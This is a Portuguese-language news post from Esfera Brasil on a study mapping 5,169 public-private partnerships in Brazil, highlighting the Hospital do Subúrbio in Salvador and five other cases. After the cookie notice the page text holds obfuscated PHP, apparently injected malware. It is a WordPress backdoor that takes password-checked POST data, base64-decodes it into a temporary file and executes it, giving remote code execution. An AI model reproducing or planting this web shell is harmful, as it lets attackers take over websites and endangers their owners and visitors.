• 15.10.2021
  • Redação

Parcerias público-privadas dão certo – eis alguns primeiros resultados consolidados

Você que acompanha e segue a Esfera Brasil sabe que o diálogo entre o público e o privado é a força motriz de qualquer país civilizado. Mas normalmente o discurso fala mais alto do que os resultados. Não mais. Acaba de ser divulgado o Mapa da Contratualização do Serviço Público no Brasil, estudo pioneiro conduzido pela Escola Nacional de Serviço Público (Enap), entidade ligada ao Ministério da Economia, e pela Comunitas, organização que modela e implementa colaborações entre os setores. 

Foram mapeadas 5.169 parcerias público-privadas (PPPs) no Brasil, divididas entre a União, as unidades da Federação e as prefeituras das capitais. Além do segmento de infraestrutura, há parcerias nas áreas de administração, hospitais, prisões, redes de fibra óptica e programas regionais de desenvolvimento. O estudo considerou as parcerias firmadas nos últimos dez anos e com duração de, no mínimo, dois anos. Segundo a Comunitas, o levantamento passará a ser atualizado anualmente, a fim de que sejam adicionados os custos e os resultados das colaborações.

“Esse mapa é uma grande enciclopédia para os gestores públicos brasileiros buscarem alternativas e soluções para gerenciamento de serviços”, explicou, ao jornal O Estado de S. Paulo, Fernando Schüler, cientista político, consultor e um dos responsáveis pela coordenação acadêmica do estudo. A título de exemplo, Schüler aponta o “caso emblemático” do Hospital do Subúrbio, em Salvador (BA). Construído e controlado pelo governo baiano, o hospital é administrado pela iniciativa privada, tem funcionários e médicos contratados pelo regime da Consolidação das Leis do Trabalho (CLT), mas atende gratuitamente pelo Sistema Único de Saúde (SUS).

O resultado? Mais eficiência para o sistema como um todo, de dentro para fora. Além da melhoria para os serviços públicos que têm o auxílio da iniciativa privada em si, as métricas de comparação tendem a capitanear a manutenção constante do modelo tradicional. Em suma, é a cooperação entre os setores como solução para um Brasil melhor. 

Os cinco casos destacados pelo levantamento foram: Programa BioPará (PA), Piauí Conectado (PI), Serviço de Limpeza Urbana e Manejo de Resíduos Sólidos de Campo Grande (MS), Resíduos Sólidos Urbanos da Região e do Colar Metropolitano de Belo Horizonte (MG) e Relógios Eletrônicos Digitais de Porto Alegre (RS).

 

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}